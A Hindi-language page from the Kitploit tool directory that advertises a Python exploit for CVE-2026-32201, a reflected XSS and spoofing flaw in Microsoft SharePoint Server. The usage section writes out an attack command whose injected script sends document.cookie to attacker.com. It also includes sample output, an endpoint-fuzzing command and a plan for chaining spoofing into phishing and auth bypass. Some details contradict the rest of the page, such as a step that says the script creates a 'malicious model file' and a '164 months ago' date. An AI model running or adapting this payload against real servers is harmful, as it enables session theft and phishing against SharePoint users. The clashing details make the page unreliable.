Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-32201-exploit — Python एक्सप्लॉइट CVE-2026-32201 के लिए, जो Microsoft SharePoint Server में एक reflected XSS है, जो तैयार किए गए HTTP अनुरोधों के माध्यम से बिना प्रमाणीकरण के स्पूफिंग और डेटा संशोधन को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/b1tbit/cve-2026-32201-exploit
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubb1tbit/cve-2026-32201-exploit

CVE-2026-32201-exploit

Python एक्सप्लॉइट CVE-2026-32201 के लिए, जो Microsoft SharePoint Server में एक reflected XSS है, जो तैयार किए गए HTTP अनुरोधों के माध्यम से बिना प्रमाणीकरण के स्पूफिंग और डेटा संशोधन को सक्षम बनाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
164 महीने पहलेअभी तक समीक्षित नहीं

अवलोकन

CVE-2026-32201 के लिए Python एक्सप्लॉइट - Microsoft SharePoint Server में अनुचित इनपुट सत्यापन, जो अनप्रमाणित नेटवर्क स्पूफिंग की अनुमति देता है (C:L/I:L)।

  • प्रभावित: SharePoint Server 2016 Enterprise, 2019, Subscription Edition < 16.0.19725.20210;
  • वेक्टर: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N;
  • प्रभाव: स्पूफ किए गए नोटिफिकेशन/दस्तावेज़ों के माध्यम से संवेदनशील डेटा देखना/बदलना।

विशेषताएं

  1. SharePoint की फ़िंगरप्रिंटिंग।
  2. इनपुट सत्यापन बायपास के लिए क्राफ्टेड POST (sender_override)।
  3. अनुकूलन योग्य पेलोड (sender, recipient, subject, XSS के साथ message)।
  4. सत्यापन के लिए प्रतिक्रिया विश्लेषण।

उपयोग

  1. इसे exploit.py के रूप में सहेजें।
  2. दुर्भावनापूर्ण मॉडल फ़ाइल बनाने के लिए इसे चलाएँ:
root@kitploit:~
python3 exploit.py https://sharepoint.target.com \
  --recipient [email protected] \
  --sender "[email protected]" \
  --message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
  --endpoint /_layouts/15/notify.aspx

आउटपुट उदाहरण:

root@kitploit:~
[+] SharePoint detected.
[*] Sending spoofed request to https://target.com/_layouts/15/notify.aspx
[+] Status: 200
[+] Potential success: Check target logs/email for spoofed content.

अनुकूलन

  • एंडपॉइंट फ़ज़िंग: ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt
  • XSS पेलोड: कुकी चोरी के लिए --message में JS जोड़ें
  • चेनिंग: स्पूफ → फ़िशिंग लिंक → ऑथ बायपास

सत्यापन

  • सफलता संकेतक: 200 OK + प्रतिक्रिया में "sent/success"
  • सर्वर-साइड: असामान्य अनुरोधों के लिए ULS लॉग/IIS लॉग जाँचें
  • प्रभाव: जाली प्रेषक के लिए ईमेल/दस्तावेज़ों की निगरानी करें, डेटा संशोधन का परीक्षण करें
टूल डाउनलोड करें